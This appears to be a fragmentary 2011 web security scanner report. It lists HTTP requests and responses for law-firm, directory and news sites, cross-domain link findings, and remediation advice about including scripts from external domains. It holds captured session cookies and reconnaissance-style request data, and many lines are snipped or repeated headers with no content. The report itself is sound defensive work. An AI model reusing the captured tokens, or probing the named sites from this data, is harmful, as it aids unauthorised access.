<link href="scripts/skadden_mini.css" rel="styl ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-224.htm" target="_blank">SEC Charges Steven Rattner in Pay-to-Play Scheme Involving New York State Pension Fund</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-225.htm" target="_blank">SEC Charges Former Madoff Employees with Fraud</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-223.htm" target="_blank">SEC Charges New York Firms and Chief Compliance Officer for Inadequate Procedures to Protect Nonpublic Information</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-220.htm" target="_blank">SEC Brings Additional Charges in Its Ongoing Investigations Into Two Insider Trading Rings</a> ...[SNIP]... <td><a href="http://www.finra.org/Newsroom/NewsReleases/2010/P122416" target="_blank">FINRA Fines Goldman Sachs $650,000 for Failing to Disclose Wells Notices</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-214.htm" target="_blank">SEC Charges Seven Oil Services and Freight Forwarding Companies for Widespread Bribery of Customs Officials</a> ...[SNIP]...
GET /domainserve/domainView?dn=testdomain123.com/?popunder=1 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /events.cfm?id=670&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an ...[SNIP]... <p> <a href="http://www.lawseminars.com/detail.php?SeminarCode=11NRDFL" target="_blank">View Event Website</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.itunes.com/podcast?id=378831191
Request
GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non- ...[SNIP]... <div class="formrow"> <a href="http://www.itunes.com/podcast?id=378831191"><img src="http://www.arnoldporter.com//images/iTunesButton.jpg" width="77" align="bottom" height="23" border="0" alt="Listen in iTunes" /> ...[SNIP]...
GET /publications.cfm?id=2795&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te ...[SNIP]... <p> <a href="http://jeclap.oxfordjournals.org/content/early/2010/10/21/jeclap.lpq062.full.pdf?ijkey=susEWMn9zEmLtCQ&keytype=ref" target="_blank">View Publication (URL)</a> ...[SNIP]...
GET /chamber/memberDetail.asp?763 HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=5vkrrjg7cv37iiacajq7gu3jm0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... </script>
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/calendar/calendar.cgi?session_key=&search_and_display_db_button=on&day=19&month=1&year=2011&results_format=headlines&query=date_search HTTP/1.1 Host: www.dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Wed, 19 Jan 2011 15:48:03 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <title>Temporarily Unavailable</title> <meta http-equiv= ...[SNIP]... <td align="right"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" /> ...[SNIP]... </a>|<a href="http://www.hagenhosting.com" target="_top">Web Hosting</a> ...[SNIP]... <td class="regalt" align="center"><a href="http://www.hagenhosting.com"><img alt="Hagen Hosting" width="305" height="44" title="Hagen Hosting: Premium quality web hosting" src="http://www.dcregistry.com/graphics/test3.gif" border="1" /> ...[SNIP]... <font class="reg"><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" width="130" height="56" border="1" alt="Premium quality web hosting!" title="Premium quality web hosting!" /> ...[SNIP]... <br /> <a href="http://www.hagenhosting.com">Premium quality web hosting!</a> ...[SNIP]... <p><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" border="1" alt="Premium quality web hosting!" width="130" height="56" title="Premium quality web hosting!" /> ...[SNIP]... <br /> <a href="http://www.hagenhosting.com">Premium quality web hosting!</a> ...[SNIP]... <font class="small"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" /> ...[SNIP]... <br /> <a href="http://www.e-classifieds.net">Classifieds for every website!</a> ...[SNIP]... </script> <a href="http://www.hagensoftware.com">Hagen Software</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=rentals HTTP/1.1 Host: www.dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:47:56 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 57980
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... </script>
<a href="http://www.litigationtrends.com"> <img src="/img/banners/ribbon/Ribbon.jpg" alt="" height="45" width="750" border="0" /> ...[SNIP]... </strong> an independent news organization that focuses on the inner workings of the U.S. Department of Justice, the Attorney General Office, U.S. Attorney news and <a href="http://www.mainjustice.com/justanti-corruption-a-new-site-from-main-justice/">white-collar crime, corruption and compliance law</a> ...[SNIP]... <td align="center" bordercolor="#DDD1C3">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
GET /washington%20dc%20law%20firms?cb=27&cmp=3917/x22 HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /2011insights.cfm?contentID=52 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... </script>
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /alumni/Index.cfm?contentID=7 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <!-- end border table -->
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
GET /gypr.aspx?afid=1993&cc=5411105100&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:09:38 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:09:38 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... <body>
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </script>
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:07 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 19 Jan 2011 16:24:14 +0000 Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 207203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... </script><script type="text/javascript" id="topsy-js-elem" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script> ...[SNIP]...
GET /tools/ HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Wed, 19 Jan 2011 15:23:41 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 13114
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
GET /config/login?.src=fpctx&logout=1&r= HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:21 GMT Set-Cookie: B=76otfft6jea6h&b=3&s=5d; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: Y=%2e; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: SSL=%2e; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com; secure P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 18382
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... </script> <script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script> ...[SNIP]...
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14265
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... </script> <script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script> ...[SNIP]... </script> <script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/main.js" type="text/javascript"></script> <script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/bc_page.js" type="text/javascript"></script> <script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/2.0/fortune500_2008.js" type="text/javascript"></script> ...[SNIP]... </div> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script> <div id="header"> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/search_form.js" type="text/javascript"></script> ...[SNIP]... </style> <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script> ...[SNIP]... </script> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/navigation/2.0/nav_fortune.js"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/3.0/services/connect-lite.js"></script> ...[SNIP]... <!-- end footer --> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js"></script> ...[SNIP]... </script>
GET /rafaelp HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:15:07 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20381
GET /domainserve/domainView HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... </style> <script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script> ...[SNIP]...
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Content-Length: 80578 Content-Type: text/html; charset=utf-8 X-Powered-By: eZ Publish Content-Language: en-US Served-by: Pragma: Cache-Control: max-age=2959 Expires: Wed, 19 Jan 2011 16:37:01 GMT Date: Wed, 19 Jan 2011 15:47:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /chamber/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... </script>
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... </script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is a law firm that sees the whole picture an ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script> ...[SNIP]... </form> <script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script> ...[SNIP]... </form> <script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
